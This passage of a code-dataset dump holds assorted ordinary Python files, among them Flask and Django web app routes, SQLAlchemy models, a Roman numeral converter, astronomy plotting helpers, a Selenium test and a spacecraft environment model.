).reset_index()\nprint(res)\n","sub_path":"week04/section7.py","file_name":"section7.py","file_ext":"py","file_size_in_byte":1517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"448080300","text":"from flask import Flask, render_template, request, flash, session, redirect, url_for, Blueprint, jsonify\nfrom flask_login import login_required, login_user, logout_user, current_user\nfrom Scheduler.model import db, Announcement\nfrom Scheduler.forms import AnnouncementForm\nfrom Scheduler.decorators import admin_required\nfrom sqlalchemy import func\nfrom sqlalchemy import and_\nimport datetime\nimport calendar\nimport sys\n\nannouncement = Blueprint('announcement', __name__, template_folder='templates')\n\ndef create_announcement(title, author, body):\n    newAnnouncement = Announcement(title, author, body)\n    db.session.add(newAnnouncement)\n    db.session.commit()\n    return newAnnouncement\n\ndef delete_announcement(id):\n    announcement = Announcement.query.filter_by(id=id).first()\n    db.session.delete(announcement)\n    db.session.commit()\n\n@announcement.route('/announcements')\ndef announcements():\n    announcements = Announcement.query.all()\n    list.reverse(announcements)\n    if len(announcements) > 0:\n        return render_template('announcements.html', announcements=announcements)\n    else:\n        msg = 'No Announcements Found'\n        return render_template('announcements.html', msg=msg)\n\n@announcement.route('/announcement/<int:id>/')\ndef view_announcement(id):\n    announcement = Announcement.query.filter_by(id=id).first()\n    return render_template('announcement.html', announcement=announcement)\n\n@announcement.route('/add_announcement', methods=['GET', 'POST'])\n@admin_required\ndef add_announcement():\n    form = AnnouncementForm(request.form)\n    if form.validate_on_submit():\n        create_announcement(form.title.data, session['username'], form.body.data)\n        flash('Announcement created!', 'success')\n        return redirect(url_for('regular.dashboard'))\n    return render_template('add_announcement.html', form=form)\n\n@announcement.route('/edit_announcement/<int:id>/', methods=['GET', 'POST'])\n@admin_required\ndef edit_announcement(id):\n    announcement = Announcement.query.filter_by(id=id).first()\n    form = AnnouncementForm(request.form)\n    form.title.data = announcement.title\n    form.body.data = announcement.body\n\n    if form.validate_on_submit():\n        delete_announcement(announcement.id)\n        title = request.form['title']\n        body = request.form['body']\n\n        create_announcement(title, session['username'], 
body)\n\n        flash('Announcement edited!', 'success')\n        \n        return redirect(url_for('regular.dashboard'))\n    return render_template('edit_announcement.html', form=form)\n\n@announcement.route('/delete_announcement/<int:id>/')\n@admin_required\ndef delete_route(id):\n    delete_announcement(id)\n    flash('Announcement Deleted!', 'success')\n    return redirect(url_for('regular.dashboard'))","sub_path":"Scheduler/announcement.py","file_name":"announcement.py","file_ext":"py","file_size_in_byte":2784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"498376433","text":"import check\nimport info\nimport variables\n#from dateutil import parser\n\ndef setVariablesFromArgs(args):\n\t\n\tvariables.files = list(args.file)\n\n\tif args.EffectParams is not None:\n\t\tvariables.Settings = list(args.EffectParams)\n\n\tif args.TimeFormat == None and variables.TimeFormat == None:\n\t\tvariables.TimeFormat = \"[%Y/%m/%d %H:%M:%S]\"\n\telif args.TimeFormat is not None:\n\t\tvariables.TimeFormat = args.TimeFormat\n\n\tif not args.YMax == None: \n\t\ttry:\n\t\t\tvariables.YMax = check.MAX_TYPE(args.YMax)\n\t\texcept:\n\t\t\tinfo.err(\"YMax of value <\" + args.YMax + \"> is invalid.\")\n\ttry:\n\t\tvariables.YMin = check.MIN_TYPE(args.YMin)\n\texcept:\n\t\tinfo.err(\"YMin of value <\" + args.YMin + \"> is invalid.\")\n\n\tif args.Speed is not None and args.Time is not None and args.FPS is not None:\n\t\tinfo.err(\"Set only two of the following: [FPS] [Speed] [Time]\")\n\n\tif args.Speed is not None and (check.is_int(args.Speed) or check.is_float(args.Speed)):\n\t\tvariables.Speed = args.Speed\n\n\tif args.Time is not None and (check.is_int(args.Time) or check.is_float(args.Time)):\n\t\tvariables.Time = args.Time\n\n\tif args.FPS is not None and (check.is_int(args.FPS) or check.is_float(args.FPS)):\n\t\tvariables.FPS = args.FPS\n\n\tif args.Legend is not None:\n\t\tvariables.Legend = args.Legend\n\n\tif args.Name is not None:\n\t\tvariables.Name = args.Name.rstrip('/')\n\telse:\n\t\tvariables.Name = variables.tmpdir\n\n\tif variables.Speed is not None and variables.Time is not None and variables.FPS is not None:\n\t\tinfo.err(\"There has been set all of the following by combining config file and args: [FPS] [Speed] [Time]\")\n\n\tif variables.FPS is not None and variables.Time is not None:\n\t\tvariables.Speed = 1\n\n\tinfo.info(\"Params from command line set successfully.\")\n\n\ndef setVar(name, value):\n\tif name.lower() == \"timeformat\":\n\t\t# should check the format validity\n\t\tvariables.TimeFormat = value\n\n\telif name.lower() == \"ymin\":\n\t\ttry:\n\t\t\tvariables.YMin = check.MIN_TYPE(value)\n\t\texcept:\n\t\t\tinfo.err(\"YMin of value <\" + value + \"> in config file is invalid.\")\n\n\telif name.lower() == \"ymax\":\n\t\ttry:\n\t\t\tvariables.YMax = check.MAX_TYPE(value)\n\t\texcept:\n\t\t\tinfo.err(\"YMax of value <\" + value + \"> in config file is invalid.\")\n\n\telif name.lower() == \"speed\":\n\t\tif variables.Time is not None and variables.FPS is not None:\n\t\t\tinfo.err(\"Speed is already set by setting the Time and FPS.\")\n\t\t\t\t\n\t\tif check.is_int(value) or check.is_float(value):\n\t\t\tvariables.Speed = value\n\t\telse:\n\t\t\tinfo.err(\"Speed value is not numeric.\")\n\n\telif name.lower() == \"time\":\n\t\tif variables.Speed is not None and variables.FPS is not None:\n\t\t\tinfo.err(\"Time is already set by setting the Speed and FPS.\")\n\t\t\t\t\n\t\tif check.is_int(value) or check.is_float(value):\n\t\t\tvariables.Time = 
value\n\t\telse:\n\t\t\tinfo.err(\"Time value is not numeric.\")\n\telif name.lower() == \"fps\":\n\t\tif variables.Time is not None and variables.Speed is not None:\n\t\t\tinfo.err(\"FPS is already set by setting the Time and Speed.\")\n\t\t\t\n\t\tif check.is_int(value) or check.is_float(value):\n\t\t\tvariables.FPS = value\n\t\telse:\n\t\t\tinfo.err(\"FPS value is not numeric.\")\n\t\n\telif name.lower() == \"legend\":\n\t\tvariables.Legend = value\n\n\telif name.lower() == \"name\":\n\t\tif value is not None:\n\t\t\tvariables.Name = str(value).rstrip('/') \n\n\n\telse:\n\t\tinfo.err(\"Keyword <\" + name + \"> with value <\" + value + \"> from config file does not appear to be valid.\")\n\n\ndef loadConfig(configFile):\n\tif configFile is None:\n\t\tinfo.info(\"Config file path not set, skipping loading from config.\")\n\t\treturn\n\tif not check.file_exists(configFile):\n\t\tinfo.err(\"Config file does not exist!\")\n\t\n\t# now load the values\n\ttry: \n\t\tfile = open(configFile, mode='r', encoding='utf-8')\n\texcept:\n\t\tinfo.err(\"Could not open config file for reading. Insufficient permissions?\")\n\n\tfor line in file:\n\t\tline=line.strip()\n\t\t# skip comments and lines with whitespaces only\n\t\tif line.startswith('#') or not line.strip():\n\t\t\tcontinue\n\t\tif \"#\" in line:\n\t\t\tline=line[0:line.find('#')]\n\t\t\tline.rstrip()\n\t\t#create array of values\t\n\t\tline = line.split(\" \", 1)\n\t\tsetVar(line[0],line[1])\n\n\tinfo.info(\"Params from config file loaded successfully.\")\n\treturn True\n\ndef checkVars():\n\tif variables.FPS is None and variables.Time is None:\n\t\tvariables.FPS = 25\n\tif variables.Speed is None:\n\t\tvariables.Speed = 1\n\n\n\n","sub_path":"reset.py","file_name":"reset.py","file_ext":"py","file_size_in_byte":4217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"327659074","text":"from flaskps import db\nfrom sqlalchemy_utils import ChoiceType\nfrom .constants import (\n    GENDER_CHOICES,\n)\n\nclass Students(db.Model):\n    id = db.Column(db.Integer, primary_key=True)\n    surname = db.Column(db.String(60))\n    name = db.Column(db.String(60))\n    birth_date = db.Column(db.Date())\n    borned = db.Column(db.String(60))\n    locality = db.Column(db.String(60))\n    address = db.Column(db.String(60))\n    gender = db.Column(ChoiceType(GENDER_CHOICES))\n    document_type = db.Column(db.String(60))\n    document_number = db.Column(db.String(60))\n    tutor = db.Column(db.String(60))\n    phone = db.Column(db.String(60))\n    tutor_name = db.Column(db.String(60))\n    level_id = db.Column(db.Integer, db.ForeignKey('level.id'), nullable=False)\n    school_id = db.Column(db.Integer, db.ForeignKey('school.id'), nullable=False)\n    neighborhood_id = db.Column(db.Integer, db.ForeignKey('neighborhood.id'), nullable=False)\n\n\n\n    def __repr__(self):\n        return '<Student %s>' % self.name\n\n    @classmethod\n    def create(cls, form):\n        instance = cls(\n            name=form.name.data,\n            surname=form.surname.data,\n            birth_date=form.birth_date.data,\n            borned=form.borned.data,\n            locality=form.locality.data,\n            address=form.address.data,\n            neighborhood_id=form.neighborhood.data,\n            gender=form.gender.data,\n            document_type=form.document_type.data,\n            document_number=form.document_number.data,\n            tutor=form.tutor.data,\n            phone=form.phone.data,\n            school_id=form.school.data,\n            level_id=form.level.data,\n            tutor_name=form.tutor_name.data,\n        )\n        db.session.add(instance)\n        try:\n            db.session.commit()\n        except:\n            db.session.rollback()\n        return instance\n\n    @classmethod\n    def delete(cls, 
student_id):\n        student = Students.query.filter_by(id=student_id).first_or_404()\n        db.session.delete(student)\n        db.session.commit()\n\n    def update(self, form):\n        self.name = form.name.data\n        self.surname = form.surname.data\n        self.birth_date = form.birth_date.data\n        self.borned = form.borned.data\n        self.locality = form.locality.data\n        self.address = form.address.data\n        self.neighborhood_id = form.neighborhood.data\n        self.gender = form.gender.data\n        self.document_type = form.document_type.data\n        self.document_number = form.document_number.data\n        self.tutor = form.tutor.data\n        self.phone = form.phone.data\n        self.school_id = form.school.data\n        self.level_id = form.level.data\n\n        db.session.commit()\n\n\nclass Neighborhood(db.Model):\n    id = db.Column(db.Integer(), primary_key=True)\n    name = db.Column(db.String(60), unique=True, nullable=False)\n\nclass Level(db.Model):\n    id = db.Column(db.Integer(), primary_key=True)\n    name = db.Column(db.String(60), unique=True, nullable=False)\n\nclass School(db.Model):\n    id = db.Column(db.Integer(), primary_key=True)\n    name = db.Column(db.String(60), unique=True, nullable=False)\n    address = db.Column(db.String(100))\n    phone = db.Column(db.String(20))\n","sub_path":"flaskps/app/students/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"246735351","text":"class Solution:\n    def romanToInt(self, s: str) -> int:\n        # Start by splitting the string into symbols\n        # Group subtractions together, maybe loop through once and check for them?\n        # E.g. look ahead to next letter and if it is greater then, group\n        # Sum up the resulting symbols\n\n        symbols = [letter for letter in s]\n\n        subtraction = False # Keep track of whether current loop is subtraction\n\n        numeral_to_int = 0\n\n        for idx, letter in enumerate(symbols):\n\n            # Skip this loop if the previous loop was subtraction\n            if subtraction:\n                subtraction = False # Reset subtraction so we continue with the loop\n                continue\n\n            # first check to make sure we are not at the end of the list\n            if (idx + 1) < len(symbols):\n                next_letter = symbols[idx+1]\n\n                # Check for all subtractions\n\n                # check for CD and CM subtraction\n                if letter == \"C\" and next_letter == \"D\":\n                    numeral_to_int += 400\n                    subtraction = True\n                    continue\n                if letter == \"C\" and next_letter == \"M\":\n                    numeral_to_int += 900\n                    subtraction = True\n                    continue\n\n                # Check for XL and XC subtraction\n                if letter == \"X\" and next_letter == \"L\":\n                    numeral_to_int += 40\n                    subtraction = True\n                    continue\n                if letter == \"X\" and next_letter == \"C\":\n                    numeral_to_int += 90\n                    subtraction = True\n                    continue\n\n                # Check for IV and IX subtraction\n                if letter == \"I\" and next_letter == \"V\":\n                    numeral_to_int += 4\n                    subtraction = True\n                    continue\n                if letter == \"I\" and next_letter == \"X\":\n                    numeral_to_int += 9\n                    subtraction = True\n                    continue\n\n            # If no subtractions, add the correct numeral value\n            # Unindented bc this can be the last element of the list\n            numeral_values = {\n                \"I\": 1,\n                \"V\": 5,\n                \"X\": 10,\n                \"L\": 50,\n                \"C\": 100,\n                \"D\": 500,\n                \"M\": 1000\n            }\n\n            numeral_to_int += numeral_values[letter]\n\n        return numeral_to_int\n\n","sub_path":"leetcode/romanToInt.py","file_name":"romanToInt.py","file_ext":"py","file_size_in_byte":2508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"496733968","text":"import pygame\r\n\r\nclass Node:\r\n    'single grid node class'\r\n\r\n    def 
__init__(self):\r\n        self.id = 0\r\n        self.color = 0 # 0 - white\r\n        self.neighbours = []\r\n        self.rect = pygame.Rect(0,0,50,50)\r\n        self.handled = False\r\n        self.isWall = False\r\n        self.x = 0\r\n        self.y = 0\r\n        self.parent = None\r\n        self.inOpenSet = False\r\n        self.g = 0\r\n        self.h = 0\r\n        self.f = 0\r\n\r\n    def __eq__(self, other):\r\n        if self.id == other.id:\r\n            return True\r\n        else:\r\n            return False\r\n    \r\n    def __lt__(self,other):\r\n        return self.f < other.f\r\n\r\n\r\n    def draw(self, window, x, y, sprites):\r\n        if self.color == 0:\r\n            window.blit(sprites[0], (x, y))\r\n        elif self.color == 1:\r\n            window.blit(sprites[1], (x, y))\r\n        elif self.color == 2:\r\n            window.blit(sprites[2], (x, y))\r\n        elif self.color == 3:\r\n            window.blit(sprites[3], (x, y))\r\n        elif self.color == 4:\r\n            window.blit(sprites[4], (x, y))\r\n\r\n    def getColor(self):\r\n        return self.color","sub_path":"grid.py","file_name":"grid.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"23741420","text":"from django.conf.urls import url\nfrom trash import views\n\nurlpatterns = [\n    url(r'^$', views.trash_list, name='trash_index'),\n    url(r'^add$', views.trash_add, name='trash_add'),\n    url(r'^list$', views.trash_list, name='trash_list'),\n    url(r'^detail/(?P<id>\\d+)$', views.trash_details, name='trash_details'),\n    url(r'^delete/(?P<id>\\d+)$', views.trash_delete, name='trash_delete'),\n    url(r'^(?P<id>\\d+)/recovery', views.recovery_file, name='recovery_file'),\n]","sub_path":"trash/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"477880577","text":"from sys import argv as argument\ntry:\n    argument[1]\nexcept IndexError:\n    exit()\n\nimport sqlite3\n\n\nconnection = sqlite3.connect('users.db')\nc = connection.cursor()\n\nif argument[1] == \"insert\":\n    user_name = input(\"Name: \")\n    user_age = input(\"Age: \")\n    c.execute(\"INSERT INTO users VALUES (?, ?)\", (user_name, user_age))\n\nelif argument[1] == \"show\":\n    username = input(\"User-Name: \")\n    c.execute(\"SELECT * FROM users WHERE name=?\", (username,))\n    print(c.fetchone())\n\nconnection.commit()\nconnection.close()\n","sub_path":"Database/sqlite/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"382824071","text":"\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm\n\n# plt.style.use('simple') # --- makes nicer plots\n\n\n\n\ndef make_significance_plot(img, threshold = 2.5, show = False, filename = False, imsize = 1):\n\n    fig = plt.figure(figsize=(imsize, imsize))\n    ax = fig.add_axes([0,0,1,1])\n\n    ax.axis('off')\n\n    sig = (img.sci/img.noise)\n\n    ax.imshow(sig, cmap = cm.Greys, vmin = -5.0, vmax = 5.0, origin = 'lower')\n    ax.imshow(np.ma.masked_where(sig <= threshold, sig), cmap = cm.plasma, vmin = threshold, vmax = 100, origin = 'lower')\n\n    if filename:\n        plt.savefig(filename)\n    if show:\n        plt.show()\n\n    plt.close(fig)\n\n\n\n\ndef make_significance_plots(imgs, threshold = 2.5):\n\n    n = len(imgs)\n\n    fig, axes = plt.subplots(1, n, figsize = (4*n,4))\n    plt.subplots_adjust(left=0, top=1, bottom=0, right=1, wspace=0.01, hspace=0.0)\n\n    for ax, (filter, img) in zip(axes, imgs.items()):\n\n        sig = (img.sci/img.noise)\n\n        ax.set_axis_off()\n        ax.imshow(sig, cmap = cm.Greys, vmin = -5.0, vmax = 5.0, origin = 
'lower')\n ax.imshow(np.ma.masked_where(sig <= threshold, sig), cmap = cm.plasma, vmin = threshold, vmax = 100, origin = 'lower')\n\n plt.show()\n plt.close(fig)\n\n\n\n\ndef make_segm_plot(segm, imsize = 1, filename = False, show = False):\n\n fig, ax = plt.subplots(1, 1, figsize = (imsize,imsize))\n\n plt.subplots_adjust(left=0, top=1, bottom=0, right=1, wspace=0.0, hspace=0.0)\n\n new_cmap = rand_cmap(int(np.max(segm)), type='bright', first_color_black=True, last_color_black=False, verbose=False)\n\n ax.imshow(segm, cmap = new_cmap, origin = 'lower')\n\n ax.set_axis_off()\n\n if filename:\n plt.savefig(filename)\n if show:\n plt.show()\n\n plt.close(fig)\n\n\n\ndef make_plots(imgs, threshold = 2.5, signficance_plot = False, filter_label = False, filename = False, show = False, use_vmax = True, fixed_range = False, imsize = 1, frame = True):\n\n n = len(imgs)\n\n if show:\n imsize = 4\n else:\n imsize = imsize\n\n if hasattr(next(iter(imgs.values())), 'sci'):\n fig, axes = plt.subplots(1, n, figsize = (n*imsize,1*imsize), dpi = next(iter(imgs.values())).sci.shape[0])\n else:\n fig, axes = plt.subplots(1, n, figsize = (n*imsize,1*imsize))\n\n plt.subplots_adjust(left=0, top=1, bottom=0, right=1, wspace=0.0, hspace=0.0)\n\n if type(signficance_plot) != list: signficance_plot = [signficance_plot]*n\n\n if hasattr(next(iter(imgs.values())), 'sci'):\n if fixed_range:\n vmax = np.max([np.max(img.sci) for img in imgs.values()])\n else:\n if fixed_range:\n vmax = np.max([np.max(img) for img in imgs.values()])\n\n\n for ax, (filter, img), sig_plot in zip(axes, imgs.items(), signficance_plot):\n\n if frame:\n ax.get_xaxis().set_ticks([])\n ax.get_yaxis().set_ticks([])\n else:\n ax.set_axis_off()\n\n if filter_label: ax.text(0.5, 0.9, filter, horizontalalignment='center', verticalalignment='center', transform=ax.transAxes, fontsize = 8, color = '1.0')\n\n if sig_plot:\n\n sig = (img.sci/img.noise)\n\n ax.imshow(sig, cmap = cm.Greys, vmin = -5.0, vmax = 5.0, origin = 'lower')\n ax.imshow(np.ma.masked_where(sig <= threshold, sig), cmap = cm.plasma, vmin = threshold, vmax = 100, origin = 'lower')\n\n else:\n\n new_cmap = rand_cmap(np.max(img), type='bright', first_color_black=True, last_color_black=False, verbose=False)\n\n if fixed_range:\n vmin = 0.0\n else:\n vmin = None\n vmax = None\n\n if hasattr(img, 'sci'):\n ax.imshow(img.sci, cmap = cm.viridis, origin = 'lower', vmin = vmin, vmax = vmax)\n else:\n ax.imshow(img, cmap = new_cmap, origin = 'lower', vmin = vmin, vmax = vmax) # --- assumes img is just a 2D array\n\n\n\n\n if filename:\n plt.savefig(filename)\n if show:\n plt.show()\n\n plt.close(fig)\n\n\n\ndef rand_cmap(nlabels, type='bright', first_color_black=True, last_color_black=False, verbose=True):\n \"\"\"\n Creates a random colormap to be used together with matplotlib. Useful for segmentation tasks\n :param nlabels: Number of labels (size of colormap)\n :param type: 'bright' for strong colors, 'soft' for pastel colors\n :param first_color_black: Option to use first color as black, True or False\n :param last_color_black: Option to use last color as black, True or False\n :param verbose: Prints the number of labels and shows the colormap. 
True or False\n :return: colormap for matplotlib\n \"\"\"\n from matplotlib.colors import LinearSegmentedColormap\n import colorsys\n\n\n\n if type not in ('bright', 'soft'):\n print ('Please choose \"bright\" or \"soft\" for type')\n return\n\n if verbose:\n print('Number of labels: ' + str(nlabels))\n\n # Generate color map for bright colors, based on hsv\n if type == 'bright':\n randHSVcolors = [(np.random.uniform(low=0.0, high=1),\n np.random.uniform(low=0.2, high=1),\n np.random.uniform(low=0.9, high=1)) for i in range(nlabels)]\n\n # Convert HSV list to RGB\n randRGBcolors = []\n for HSVcolor in randHSVcolors:\n randRGBcolors.append(colorsys.hsv_to_rgb(HSVcolor[0], HSVcolor[1], HSVcolor[2]))\n\n if first_color_black:\n randRGBcolors[0] = [0, 0, 0]\n\n if last_color_black:\n randRGBcolors[-1] = [0, 0, 0]\n\n random_colormap = LinearSegmentedColormap.from_list('new_map', randRGBcolors, N=nlabels)\n\n # Generate soft pastel colors, by limiting the RGB spectrum\n if type == 'soft':\n low = 0.6\n high = 0.95\n randRGBcolors = [(np.random.uniform(low=low, high=high),\n np.random.uniform(low=low, high=high),\n np.random.uniform(low=low, high=high)) for i in range(nlabels)]\n\n if first_color_black:\n randRGBcolors[0] = [0, 0, 0]\n\n if last_color_black:\n randRGBcolors[-1] = [0, 0, 0]\n random_colormap = LinearSegmentedColormap.from_list('new_map', randRGBcolors, N=nlabels)\n\n # Display colorbar\n if verbose:\n from matplotlib import colors, colorbar\n from matplotlib import pyplot as plt\n fig, ax = plt.subplots(1, 1, figsize=(15, 0.5))\n\n bounds = np.linspace(0, nlabels, nlabels + 1)\n norm = colors.BoundaryNorm(bounds, nlabels)\n\n cb = colorbar.ColorbarBase(ax, cmap=random_colormap, norm=norm, spacing='proportional', ticks=None,\n boundaries=bounds, format='%1i', orientation=u'horizontal')\n\n return random_colormap\n\n\ndef COG_plots(Properties, ModelProperties = False, filename = False, show = False):\n\n nfilters = len(Properties)\n\n fig, axes = plt.subplots(1, nfilters, figsize = (3*(nfilters),3), dpi = 200)\n\n plt.subplots_adjust(left=0.025, top=0.85, bottom=0.2, right=0.9, wspace=0.2, hspace=0.0)\n\n for ax, (filter, properties) in zip(axes, Properties.items()):\n\n ax.set_title(filter, fontsize = 10)\n\n ax.plot(properties['photometry']['aperture'].radii, properties['photometry']['aperture'].flux, c = '0.5', label = 'curve-of-growth')\n ax.axvline(properties['photometry']['aperture'].optimum_radius, color = '0.5', alpha = 0.5)\n\n if ModelProperties is not False:\n\n ax.axhline(ModelProperties[filter]['photometry']['total'].flux, color = '0.5', alpha = 0.5, ls = ':')\n ax.plot(ModelProperties[filter]['photometry']['aperture'].radii, ModelProperties[filter]['photometry']['aperture'].flux, c = '0.5', ls = ':', label = 'true curve-of-growth')\n\n\n\n del properties['photometry']['aperture']\n\n color_idx = np.linspace(0, 1, len(properties['photometry']))\n\n for c_idx, (phot_type, p) in zip(color_idx, properties['photometry'].items()):\n\n ax.axhline(p.flux, label = phot_type, color = cm.viridis(c_idx))\n ax.axhspan(p.flux-p.error, p.flux+p.error, color = cm.viridis(c_idx), alpha=0.5)\n if phot_type == 'optimum_aperture': ax.axvline(p.radius, color = cm.viridis(c_idx), alpha = 0.5)\n\n ax.legend(bbox_to_anchor=(1.1, 1.0), fontsize = 8)\n\n if filename:\n plt.savefig(filename)\n if show:\n plt.show()\n\n plt.close(fig)\n\n\n\ndef SED_plot(Properties, ModelProperties = False, FilterInfo = False, phot_type = 'optimum_aperture', filename = False, show = False):\n\n\n # if not 
FilterInfo:\n\n fig, ax = plt.subplots(1, 1, figsize = (3,2), dpi = 200)\n plt.subplots_adjust(left=0.2, top=0.85, bottom=0.25, right=0.9, wspace=0.2, hspace=0.0)\n\n color_idx = np.linspace(0, 1, len(Properties))\n\n for c_idx, (filter, properties) in zip(color_idx, Properties.items()):\n\n pivwv = FilterInfo[filter].pivwv()/1E4\n\n ax.scatter(pivwv, properties['photometry'][phot_type].flux, color = cm.viridis(c_idx))\n ax.plot([pivwv]*2, [properties['photometry'][phot_type].flux - properties['photometry'][phot_type].error, properties['photometry'][phot_type].flux + properties['photometry'][phot_type].error], color = 'k', lw = 1)\n\n if ModelProperties is not False:\n\n ax.scatter(pivwv, ModelProperties[filter]['photometry']['total'].flux, color = cm.viridis(c_idx), alpha = 0.5)\n\n\n\n ax.set_xlabel(r'$\\lambda/\\mu m$')\n ax.set_ylabel(r'$f_{\\nu}/nJy$')\n\n if filename:\n plt.savefig(filename)\n if show:\n plt.show()\n\n plt.close(fig)\n\n\n\n\ndef size_plot(img, p, ExclusionMask, threshold = 2.5, signficance_plot = False, filename = False, show = False, add_contours = False):\n\n\n width = img.sci.shape[0]\n\n fig, ax = plt.subplots(1, 1, figsize = (3,3), dpi = width*2)\n plt.subplots_adjust(left=0, top=1, bottom=0, right=1, wspace=0.01, hspace=0.0)\n\n ax.set_axis_off()\n\n sig = (img.sci/img.noise)\n\n ax.imshow(sig, cmap = cm.Greys, vmin = -5.0, vmax = 5.0, origin = 'lower')\n ax.imshow(np.ma.masked_where(sig <= threshold, sig), cmap = cm.plasma, vmin = threshold, vmax = 100, origin = 'lower')\n\n k = 2.5\n\n # --- make mask image including Kron Mask and Exclusion mask\n x = np.linspace(-(width//2), (width//2), width)\n X, Y = np.meshgrid(x, x)\n R2 = X**2 + Y**2\n alpha = np.zeros(img.sci.shape)\n alpha[R2>(k*p['kron_radius'])**2] = 1\n alpha[img.sci 0 and \\\n request.args.get('start_date') != \"undefined\":\n start_date_string = request.args.get('start_date')\n if 'end_date' in request.args and \\\n len(request.args.get('end_date')) > 0 and \\\n request.args.get('end_date') != \"undefined\":\n end_date_string = request.args.get('end_date')\n\n return end_date_string, start_date_string\n\n\ndef parse_dates_from_request():\n end_date_string, start_date_string = parse_dates_as_str_from_request()\n # noinspection PyBroadException\n try:\n start_date = datetime.datetime.strptime(start_date_string, '%Y-%m-%d')\n end_date = datetime.datetime.strptime(end_date_string, '%Y-%m-%d')\n except Exception:\n abort(400, 'Start and end dates must be valid. 
Dates must be in the form of YYYY-MM-DD.')\n        return\n\n    return end_date, start_date\n\n\nbp = Blueprint('system', __name__, url_prefix='/system')\napi_groups = ['admins']\n\n\n@route(bp, '/error_email_test')\n@login_required\n@groups_required(api_groups, all=False)\ndef error_email_test():\n    errors.email_exception(app, Exception(\"test\"))\n    return {'status':'ok'}\n","sub_path":"taa/api/api_helpers.py","file_name":"api_helpers.py","file_ext":"py","file_size_in_byte":1643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"158961448","text":"import time\r\n\r\n\r\ndef test_button_add_to_basket(browser):\r\n    link = f\"http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207/\"\r\n    browser.get(link)\r\n    \r\n    button = browser.find_element_by_css_selector(\"#add_to_basket_form > button\")\r\n    button.click()\r\n    time.sleep(10)\r\n    \r\ndef test_button_text(browser):\r\n\r\n    link = f\"http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207/\"\r\n    browser.get(link)\r\n    try:\r\n        button = browser.find_element_by_xpath(\"//button[text()='Add to basket']\")\r\n        \r\n        \r\n    except:\r\n        button = browser.find_element_by_css_selector(\"#add_to_basket_form > button\")\r\n        \r\n    assert button is not None, \"The button exists, but check that its label is in English\"\r\n    \r\n\r\n    ","sub_path":"test_items.py","file_name":"test_items.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"373355999","text":"from django.shortcuts import render, redirect\nfrom django.http import Http404\nfrom .funcs import Books\nfrom .forms import SearchBarFilters\n\n# class init\nbooks = Books()\n\ndef index(request):\n    context = {\n        \"title\": \"LibraLive: Catalog\",\n        \"popular_books\": books.get_6_most_popular(),\n        \"latest_books\": books.get_6_latest(),\n        \"filters\": SearchBarFilters\n    }\n    if request.method == \"POST\":\n        form = SearchBarFilters(request.POST)\n        if form.is_valid():\n            return redirect(search)\n    return render(request, \"library/index.html\", context)\n\ndef search(request):\n    requested_books = books.apply_filters(request.POST)\n    context = {\n        \"title\": \"LibraLive: Search results\",\n        \"requested_books\": requested_books,\n        \"filters\": SearchBarFilters\n    }\n    return render(request, \"library/search.html\", context)\n\ndef book(request, book_id):\n    requested_book = books.get_by_id(book_id)\n    if not requested_book:\n        raise Http404()\n    context = {\n        \"title\": f\"LibraLive: Book: {requested_book.title}\",\n        \"book\": requested_book,\n    }\n    return render(request, \"library/book.html\", context)\n\ndef download(request, book_id):\n    if request.method == \"POST\" and book_id:\n        books.registrate_download(book_id)\n    raise Http404()\n\ndef about(request):\n    return render(request, \"library/about.html\", {\"title\": \"LibraLive: About us\"})\n\ndef not_found(request, exception):\n    return render(request, \"library/404.html\", {\"title\": \"LibraLive: Not found\"})\n","sub_path":"LibraLive/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"352762470","text":"\nfrom .MagEnv import MagEnv\nfrom .AtmophericModel.EarthModel import EarthModel\n\n\nclass Environment(MagEnv, EarthModel):\n    def __init__(self, environment_properties):\n        MagEnv.__init__(self, environment_properties['MAG'])\n        EarthModel.__init__(self)\n\n        self.env_mag_flag = 
environment_properties['MAG']['mag_calculation']\n self.env_srp_flag = environment_properties['SRP']['srp_calculation']\n self.env_atm_flag = environment_properties['ATM']['atm_calculation']\n\n print('\\nEnvironment properties')\n print('------------------------------')\n print('Magnetic: ' + str(self.env_mag_flag))\n print('Solar radiation: ' + str(self.env_srp_flag))\n print('Atmosphere: ' + str(self.env_atm_flag))\n print('------------------------------')\n\n def update(self, decyear, dynamics):\n sideral = dynamics.ephemeris.selected_planet.current_sideral\n lat = dynamics.trajectory.current_lat\n lon = dynamics.trajectory.current_long\n alt = dynamics.trajectory.current_alt\n q_i2b = dynamics.attitude.current_quaternion_i2b\n if self.env_mag_flag:\n self.calc_mag(decyear, sideral, lat, lon, alt, q_i2b)\n if self.env_atm_flag:\n self.calc_atmospferic_data(alt)\n\n\n\n\n","sub_path":"Environments/Environment.py","file_name":"Environment.py","file_ext":"py","file_size_in_byte":1283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"429186519","text":"# This file is part of the Reproducible and Reusable Data Analysis Workflow\n# Server (flowServ).\n#\n# Copyright (C) 2019-2020 NYU.\n#\n# flowServ is free software; you can redistribute it and/or modify it under the\n# terms of the MIT 